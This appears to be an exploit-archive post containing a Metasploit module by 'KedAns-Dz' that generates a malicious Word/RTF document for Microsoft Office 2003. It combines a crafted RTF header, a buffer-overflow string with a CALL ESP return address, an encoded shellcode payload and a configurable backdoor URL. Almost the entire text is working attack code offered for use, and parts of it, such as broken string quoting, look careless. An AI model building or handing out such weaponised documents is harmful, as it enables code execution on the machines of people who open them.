标题: Microsoft Office 2003 (.doc) Command Exec and local BOF (msf)
作者: KedAns-Dz
平台: windows ( local BOF via MSF)
类型: local exploit / Buffer Overflow / Metasploit
###
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ------------------------------------------------- < |
###
##
# $Id: ms09_067_word_exec.rb | 01:59 25/01/2012| KedAns-Dz $
##
require ''msf/core''
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
''Name'' => ''Microsoft Office 2003 (.doc) Command Exec and local BOF'',
''Description'' => %q{
This module exploits a buffer overflow in Microsoft Office 2003
and Command Exec With .doc file .
},
''License'' => MSF_LICENSE,
''Author'' =>
[
''b33f'',
''g11tch'',
''KedAns-Dz
],
''Version'' => ''1.0'',
''References'' =>
[
[ ''URL'', ''http://'' ],
],
''DefaultOptions'' =>
{
''EXITFUNC'' => ''process'',
},
''Payload'' =>
{
''Space'' => 1024,
''BadChars'' => "''",
''EncoderType'' => Msf::Encoder::Type::AlphanumMixed,
''EncoderOptions'' =>
{
''BufferRegister'' => ''ESI'',
}
},
''Platform'' => ''win'',
''Targets'' =>
[
[ ''Microsoft Office 2003 - MSWord (.doc Heap Spray)'', { ''Ret'' => '''' } ],
],
''DisclosureDate'' => ''JAN 08 2012'',
''DefaultTarget'' => 0))
register_options(
[
OptString.new(''FILENAME'', [ true, ''The file name.'', ''msf.doc'']),
OptString.new(''URLBD'', [ true, ''URL From the Backdoor.'', ''http://'']),
], self.class)
end
def exploit
# Encode the url.
url = Rex::Text.to_unescape(datastore[''URLBD''])
# Header File
file =
"\x7b\x5c\x72\x74\x23\x23\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70"+
"\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73"+
"\x68\x70\x7b\x5c\x73\x70\x7d\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a"+
"\x5c\x73\x68\x70\x69\x6e\x73\x74\x5c\x73\x68\x70\x66\x68\x64\x72"+
"\x30\x5c\x73\x68\x70\x62\x78\x63\x6f\x6c\x75\x6d\x6e\x5c\x73\x68"+
"\x70\x62\x79\x70\x61\x72\x61\x5c\x73\x68\x20\x70\x77\x72\x32\x7d"+
"\x7b\x5c\x73\x70\x7b\x5c\x73\x6e\x20\x7b\x7d\x7b\x7d\x7b\x5c\x73"+
"\x6e\x7d\x7b\x5c\x73\x6e\x7d\x7b\x5c\x2a\x5c\x2a\x7d\x70\x46\x72"+
"\x61\x67\x6d\x65\x6e\x74\x73\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x7b\x5c\x73\x76\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x52"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c"+
"\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x39\x3b\x32\x3b\x66\x66"+
"\x66\x66\x66\x66\x66\x66\x66\x66"
# Buffer Overflow
buf = "\x23" * 501
buf << "\x30\x35"
buf << "\x30" * 40
buf << "\x36\x36\x34\x33\x33\x32\x33\x30" # CALL ESP - WINWORD.exe
buf << "\x30\x30\x30\x30\x38\x30\x37\x63" * 2
buf << rand_text_alpha(42)
buf << "\x39\x30" * 18
buf << payload.encoded
# Create the doc
doc = file
doc << buf
doc << url
doc << "\x00"
doc << "{}}}}}}"
doc << "\x0d\x0a"
doc << "}"
print_status("Creating ''#{datastore[''FILENAME'']}'' file...")
file_create(doc)
end
end